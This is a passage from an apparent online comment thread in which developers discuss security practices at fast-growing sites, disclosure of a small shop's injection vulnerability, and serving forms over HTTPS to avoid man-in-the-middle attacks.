Needless to say, it didn't work. Also to be noted, there were no noticed service disruptions caused by any 3rd party. We were small fish.
Which leads me to the following - security is a scaling issue. Sure, your prototype even though ready for going live, need not really be secured in most use cases. But once you start to grow, especially rapidly, things can easily spin out of control.
You need some time to get a proper certificate, your database looks like development version on your local machine, you've handed out few ssh keys via e-mail and it's on few USB sticks lying around for root admin on deployment server (since someone has to take care of it while you sleep), you login on public networks to get company resources you need asap, etc.
What I'm really interested is - how does one scale it? What are the priorities?
This adds a bit more up front planning pain to any project and also slightly slows down the daily dev routine BUT it pays dividends further down the line when you suddenly start getting noticed and your usage figures begin multiplying every 24 hours. In that situation there isn't time to re-work production dbms schemas, change the app code to deal with bcrypt'd password hashes, change the deployment script to make it more secure so you don't end up accidentally dropping a dev version of the site on your public servers etc. etc.
Better to pay the up front cost of getting the basics correct at the beginning of the project rather than dealing with an un-contained explosion later on just as you hit the limelight.
Also, the up-front pain of doing this diminishes with every additional project you do as a lot of the concepts, approaches and procedures are re-usable.
Totally agree on that last part. The pain rapidly diminishes as you come up with simpler ways to do things in a reusable way. Also, the tools to do it are getting better and better as more and more people are feeling the same pain.
For instance, properly escaping output, parameterized queries, password hashing -- all those don't require more work (or if they do, it's so, so minimal). I mean, jeez, you're writing the code, just do it right.
That's a far cry from setting up multiple servers, certificates, etc. and having a real operations process. I can forgive, say, not having automatic builds. But there's no excuse for having a SQL injection in 2012.
Disclaiming though, I clearly state to such clients that security will not be really up to challenge on those timelines. They usually don't care, even to a point that I don't really bother anyone with it, since I get blank stares when I discuss security with them.
I can assure you that the blank stares go away completely when there is a breach. You will probably learn by then that your customers just expect you to handle it professionally. They might not be able to think beyond their deadline and their first business goal, but leaking passwords or losing user data will be your fault eventually.
I will not pretend that all my past work is bulletproof, but it should be not so difficult to make sure your tools and code handle all incoming data like hot grenades. You might skip some big-upfront-user-import in the beginning as you control the data chain, but $_POST or params[:model] or what else is flying in your face should be met with a standard treatment.
Think of it this way: right now you do not want to have your CV say "2012: developed user login module for LinkedIn. Finished within the deadline"
While a small site might not be targeted directly, you might still get hit by an automatic attack if you use any off the shelf software. It's not fun when Google marks your site as harmful because your OpenX-Ad-Server suddenly serves malicious ads.
Well written article that strikes the right tone.
However, some of those basic injection flaws in classic ASP would not have been possible on a more modern technology stack be that from Microsoft or other. A 5 year old version of PHP also isn't going to do you any favours. Newer frameworks are simply better at saving you from yourself - but that doesn't excuse the sloppy practices.
This kind of stuff happens, but in essence Billabong's sysadmin needs to start surfing exploit mailing lists more than he's surfing other places :)
Ditto with XSS.
What should I do now?
Last time I pointed them out to some wikipedia articles relating to their vulnerabilities.
However, this might depend on where you live. Some countries (like the UK, where I'm typing this from) make testing website for vulnerabilities illegal, no matter how serious the issue or good the intentions. Very few people are actually caught by these laws, but there is always a risk that you piss off a litigious company, who then go after you.
I probably wouldn't have done that if I didn't already have a relationship with the vendor, though. I don't want to be accused of extortion or cyberterrorism.
I would say the biggest concern is that you could become a target. Say that you, in good nature, inform them that you can buy items for free due to a injection attack. 4 days later someone else buys $10,000 worth of gear using the same exploit. They now only have one suspect: You.
If you do feel the need to spill who is at fault, you can do it in the comments or in a follow-up post at a later date.
As it is only a small shop, I think I will email them again, but this time with a link that point to a more verbose version of the vulnerability, as someone mention.
You could apparently serve the author a form over SSL, have it post to a malicious server, and he'd be none the wiser because he's focused on whether the empty form was sent over an encrypted socket.
I am unaware of any protocol semantics that allow an HTTP server to determine how the submitted data was marshaled.
As Facebook learned, submitting to an HTTPS server isn't enough, the form must be too. Otherwise you can be man-in-the-middle attacked on the form page. Better yet, serve everything over HTTPS, so people can't change the links.
That's VERY different for a man-in-the-middle attack.
Do you think the coffee shop should have offered encrypted wifi?